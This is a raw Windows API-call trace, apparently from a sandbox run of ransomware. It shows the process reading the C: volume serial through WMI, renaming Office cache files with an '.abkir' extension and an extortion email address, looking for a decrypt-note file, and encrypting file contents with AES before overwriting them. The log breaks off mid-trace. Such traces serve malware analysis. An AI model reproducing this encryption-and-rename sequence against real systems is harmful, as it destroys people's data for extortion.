[2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0145.182] WbemLocator:IUnknown:Release (This=0x6024890) returned 0x2 [0145.182] WbemLocator:IUnknown:Release (This=0x6024890) returned 0x1 [0145.182] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0145.183] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0145.183] WbemLocator:IUnknown:QueryInterface (in: This=0x6024890, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6024890) returned 0x0 [0145.183] WbemLocator:IUnknown:AddRef (This=0x6024890) returned 0x3 [0145.183] WbemLocator:IUnknown:Release (This=0x6024890) returned 0x2 [0145.183] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025760, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0145.183] WbemDefPath:IWbemPath:GetText (in: This=0x6025760, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0145.183] WbemDefPath:IWbemPath:GetText (in: This=0x6025760, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0145.183] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6024880) returned 0x0 [0145.183] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024880, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x601ff44) returned 0x0 [0147.267] WbemLocator:IUnknown:QueryInterface (in: This=0x601ff44, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5ac84) returned 0x0 [0147.267] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ac84, pProxy=0x601ff44, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0147.267] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x1 [0147.267] WbemLocator:IUnknown:QueryInterface (in: This=0x601ff44, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5aca4) returned 0x0 [0147.268] WbemLocator:IUnknown:QueryInterface (in: This=0x601ff44, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5ac84) returned 0x0 [0147.268] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ac84, pProxy=0x601ff44, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0147.268] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x2 [0147.268] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0147.268] CoTaskMemFree (pv=0xbd4a38) [0147.268] WbemLocator:IUnknown:Release (This=0x6024880) returned 0x0 [0147.268] WbemLocator:IUnknown:QueryInterface (in: This=0x601ff44, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5aca4) returned 0x0 [0147.268] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0147.269] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0147.391] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0147.391] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0147.392] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0147.392] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5ac04) returned 0x0 [0147.392] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ac04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0147.392] WbemLocator:IUnknown:Release (This=0xb5ac04) returned 0x3 [0147.392] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0147.392] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0147.392] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5ac8c) returned 0x0 [0147.393] WbemLocator:IRpcOptions:Query (in: This=0xb5ac8c, pPrx=0xb5aca4, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0147.393] WbemLocator:IUnknown:Release (This=0xb5ac8c) returned 0x3 [0147.393] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0147.393] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0147.393] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0147.393] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x601ff44) returned 0x0 [0147.393] WbemLocator:IUnknown:AddRef (This=0x601ff44) returned 0x4 [0147.393] WbemLocator:IUnknown:Release (This=0x601ff44) returned 0x3 [0147.393] WbemLocator:IUnknown:Release (This=0x601ff44) returned 0x2 [0147.393] SysStringLen (param_1=0x0) returned 0x0 [0147.393] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60257d0, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0147.393] WbemDefPath:IWbemPath:GetText (in: This=0x60257d0, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0147.393] WbemDefPath:IWbemPath:GetText (in: This=0x60257d0, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0147.393] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0147.393] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0147.393] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5aca4) returned 0x0 [0147.393] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x3 [0147.393] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0147.393] WbemDefPath:IWbemPath:GetText (in: This=0x60257d0, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0147.393] WbemDefPath:IWbemPath:GetText (in: This=0x60257d0, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0147.393] IWbemServices:GetObject (in: This=0x601ff44, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6027e50, ppCallResult=0x0) returned 0x0 [0147.847] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025760, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0147.847] WbemDefPath:IWbemPath:GetText (in: This=0x6025760, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0147.847] WbemDefPath:IWbemPath:GetText (in: This=0x6025760, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0147.847] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d43e4*=0, plFlavor=0x36d43e8*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d43e4*=8, plFlavor=0x36d43e8*=0) returned 0x0 [0147.847] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.847] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.847] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d43e4*=8, plFlavor=0x36d43e8*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d43e4*=8, plFlavor=0x36d43e8*=0) returned 0x0 [0147.848] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.848] SysStringByteLen (bstr="9C354B42") returned 0x10 [0147.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0147.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6d [0147.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0147.848] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x14621680, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0147.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0147.848] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0147.849] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0147.849] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0147.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0147.849] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd320fa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xd320fa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xd36d260, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0147.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0147.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0147.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0147.850] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x36d4ae8 | out: lpFileInformation=0x36d4ae8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00)) returned 1 [0147.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0147.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0147.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0147.850] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0147.850] GetFileType (hFile=0x31c) returned 0x1 [0147.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0147.850] GetFileType (hFile=0x31c) returned 0x1 [0147.850] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x263e00 [0147.852] ReadFile (in: hFile=0x31c, lpBuffer=0x4895460, nNumberOfBytesToRead=0x263e00, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x4895460*, lpNumberOfBytesRead=0x6c0f4ec*=0x263e00, lpOverlapped=0x0) returned 1 [0147.888] CloseHandle (hObject=0x31c) returned 1 [0147.888] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xb1ebf8) returned 1 [0147.889] CryptGenRandom (in: hProv=0xb1ebf8, dwLen=0x10, pbBuffer=0x36d53c8 | out: pbBuffer=0x36d53c8) returned 1 [0148.584] CryptImportKey (in: hProv=0xb1ebf8, pbData=0x375563c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f7d0) returned 1 [0148.584] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.584] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.584] CryptDuplicateKey (in: hKey=0xb7f7d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7f8d0) returned 1 [0148.584] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.584] CryptSetKeyParam (hKey=0xb7f8d0, dwParam=0x4, pbData=0x375571c*=0x1, dwFlags=0x0) returned 1 [0148.584] CryptSetKeyParam (hKey=0xb7f8d0, dwParam=0x1, pbData=0x37556e8, dwFlags=0x0) returned 1 [0148.597] CryptEncrypt (in: hKey=0xb7f8d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4d01f80*, pdwDataLen=0x6c0f4b8*=0x263e10, dwBufLen=0x263e10 | out: pbData=0x4d01f80*, pdwDataLen=0x6c0f4b8*=0x263e10) returned 1 [0148.617] CryptEncrypt (in: hKey=0xb7f8d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3755744*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x3755744*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0148.618] CryptDestroyKey (hKey=0xb7f7d0) returned 1 [0148.618] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0148.618] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0148.618] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0148.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0148.618] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0148.622] GetFileType (hFile=0x2f0) returned 0x1 [0148.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0148.623] GetFileType (hFile=0x2f0) returned 0x1 [0148.623] WriteFile (in: hFile=0x2f0, lpBuffer=0x3755d74*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x3755d74*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0149.232] CloseHandle (hObject=0x2f0) returned 1 [0149.233] CoTaskMemAlloc (cb=0x20c) returned 0xbe3280 [0149.233] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe3280 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0149.233] CoTaskMemFree (pv=0xbe3280) [0149.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.233] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0149.233] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0149.233] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0149.233] IUnknown:Release (This=0xb51e34) returned 0x1 [0149.234] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6024990) returned 0x0 [0149.235] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024990, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0149.235] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024990, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6025450) returned 0x0 [0149.235] WbemDefPath:IUnknown:Release (This=0x6024990) returned 0x0 [0149.235] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6025450) returned 0x0 [0149.235] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0149.235] WbemDefPath:IUnknown:AddRef (This=0x6025450) returned 0x3 [0149.235] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0149.235] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0149.235] 